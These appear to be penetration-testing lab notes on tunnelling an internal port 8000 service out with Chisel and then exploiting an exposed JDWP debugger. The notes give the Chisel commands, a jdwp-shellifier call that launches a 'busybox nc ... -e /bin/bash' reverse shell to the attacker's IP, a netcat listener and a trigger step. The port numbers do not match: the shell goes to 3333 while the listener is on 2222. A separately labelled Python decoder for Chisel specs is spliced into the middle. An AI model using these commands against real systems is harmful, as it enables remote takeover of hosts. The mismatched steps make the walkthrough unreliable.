Chisel Port Forwarding
Port Forwarding with Chisel:
When performing internal network enumeration, it's crucial to identify services running on various ports. In this case, we discovered a service running on port 8000 using the ss command:
ss -ntplu
This command lists all listening TCP and UDP sockets, with numeric ports and the owning process for each, which helps us pinpoint the internal service.
Setting Up a Port Forward with Chisel
To access the internal service remotely, we can set up a port forward using Chisel, a TCP/UDP tunneling tool carried over HTTP that supports reverse port forwarding. This lets us forward port 8000 from the target machine to our attack machine.
Step 1: Start the Chisel Server on the Attacker Machine
On our attacking machine, we start a Chisel server that listens on port 9000:
chisel server -p 9000 --reverse
Step 2: Start the Chisel Client on the Target Machine
On the target machine, we run the following command to establish a reverse tunnel, forwarding port 8000 to our attacking machine:
./chisel client --max-retry-count 1 192.168.45.241:9000 R:8000:127.0.0.1:8000
This command connects the target machine to our Chisel server at 192.168.45.241:9000 and makes the target's 127.0.0.1:8000 reachable as port 8000 on our local system.
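As an added example (not part of these notes, and not chisel's own code), a small Python decoder for chisel remote specs such as the R:8000:127.0.0.1:8000 above: given a spec captured from process telemetry or a shell history, it reports which side of the tunnel listens and which address the traffic is delivered to, so a reviewer can tell exactly what a tunnel exposed. It is a simplified re-implementation of chisel's documented remote syntax; the defaults (0.0.0.0 for the listening host, 127.0.0.1 for the destination, local port equal to remote port) follow my reading of chisel's documentation, and socks, stdio and bracketed IPv6 forms are left out.

```python
# Decode chisel "remote" specs: which side listens and where traffic goes. Assumption:
# a simplified re-implementation of chisel's documented syntax (local-host:local-port:
# remote-host:remote-port, optional R: prefix, /udp suffix); socks, stdio and IPv6 omitted.
import re
from dataclasses import dataclass

PORT_RE = re.compile(r"^\d{1,5}$")

@dataclass
class Remote:
    reverse: bool
    local_host: str
    local_port: str
    remote_host: str
    remote_port: str
    proto: str = "tcp"

    def describe(self) -> str:
        # R: means the chisel server listens and traffic exits on the client's side
        who, exit_side = ("server", "client") if self.reverse else ("client", "server")
        return (f"{who} listens on {self.local_host}:{self.local_port}/{self.proto}; "
                f"delivered to {self.remote_host}:{self.remote_port} as reachable from the {exit_side}")

def decode_remote(spec: str) -> Remote:
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    proto = "tcp"
    if "/" in body:
        body, proto = body.rsplit("/", 1)
        if proto not in ("tcp", "udp"):
            raise ValueError(f"unknown protocol in {spec!r}")
    parts = body.split(":")
    if not 1 <= len(parts) <= 4 or "" in parts:
        raise ValueError(f"invalid remote {spec!r}")
    local_host = local_port = remote_host = remote_port = ""
    for part in reversed(parts):  # chisel fills the remote side first, then the local side
        if PORT_RE.match(part):
            remote_port = remote_port or part
            local_port = part  # local port defaults to the remote port
        elif not remote_port:
            raise ValueError(f"missing port in {spec!r}")
        elif not remote_host:
            remote_host = part
        else:
            local_host = part
    return Remote(reverse, local_host or "0.0.0.0", local_port, remote_host or "127.0.0.1", remote_port, proto)

if __name__ == "__main__":  # the spec from this page plus two forward-tunnel variants
    for spec in ("R:8000:127.0.0.1:8000", "3000:10.0.0.5:80", "5353/udp"):
        print(f"{spec:>22} -> {decode_remote(spec).describe()}")
```

Note that the listening side defaults to 0.0.0.0, so for the page's spec anyone who can reach port 8000 on the Chisel server host also reaches the target's internal service.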
Using the Port Forward for Exploitation
Now that port 8000 is accessible from our attacking machine, we can utilize it for exploitation. For example, if the service running on port 8000 is a Java Debug Wire Protocol (JDWP) instance, we can use jdwp-shellifier.py to execute commands remotely:
python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "busybox nc 192.168.45.241 3333 -e /bin/bash"
Step 3: Set Up a Listener for the Reverse Shell
Before triggering the exploit, we set up a netcat listener on our attack machine to catch the reverse shell:
nc -nvlp 2222
Step 4: Trigger the Reverse Shell on the Target
To initiate the shell connection, we trigger an event on the target machine:
nc 127.0.0.1 5000
Once executed, this should provide us with a remote shell, allowing further exploitation and post-exploitation activities.